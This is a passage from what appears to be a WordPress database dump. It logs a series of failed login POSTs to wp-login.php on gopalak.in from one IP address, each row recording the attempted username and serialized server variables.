s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745433873.0439529;s:12:\"REQUEST_TIME\";i:1745433873;}}','13.201.132.241',0,'2025-04-24 00:14:34','1970-01-01 00:00:00'),(93992,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745433873.029566;s:12:\"REQUEST_TIME\";i:1745433873;}}','13.201.132.241',0,'2025-04-24 00:14:34','1970-01-01 00:00:00'),(93993,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745433873.0319099;s:12:\"REQUEST_TIME\";i:1745433873;}}','13.201.132.241',0,'2025-04-24 00:14:34','1970-01-01 00:00:00'),(93994,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745433873.030334;s:12:\"REQUEST_TIME\";i:1745433873;}}','13.201.132.241',0,'2025-04-24 00:14:35','1970-01-01 00:00:00'),(93995,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745433874.84723;s:12:\"REQUEST_TIME\";i:1745433874;}}','13.201.132.241',0,'2025-04-24 00:14:36','1970-01-01 00:00:00'),(93996,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745434261.5166979;s:12:\"REQUEST_TIME\";i:1745434261;}}','13.201.132.241',0,'2025-04-24 00:21:03','1970-01-01 00:00:00'),(93997,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745434261.520617;s:12:\"REQUEST_TIME\";i:1745434261;}}','13.201.132.241',0,'2025-04-24 00:21:03','1970-01-01 00:00:00'),(93998,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745434261.515168;s:12:\"REQUEST_TIME\";i:1745434261;}}','13.201.132.241',0,'2025-04-24 00:21:03','1970-01-01 00:00:00'),(93999,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745434261.5198219;s:12:\"REQUEST_TIME\";i:1745434261;}}','13.201.132.241',0,'2025-04-24 00:21:03','1970-01-01 00:00:00'),(94000,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745434261.517585;s:12:\"REQUEST_TIME\";i:1745434261;}}','13.201.132.241',0,'2025-04-24 00:21:03','1970-01-01 00:00:00'),(94001,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745434649.6235549;s:12:\"REQUEST_TIME\";i:1745434649;}}','13.201.132.241',0,'2025-04-24 00:27:32','1970-01-01 00:00:00'),(94002,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIP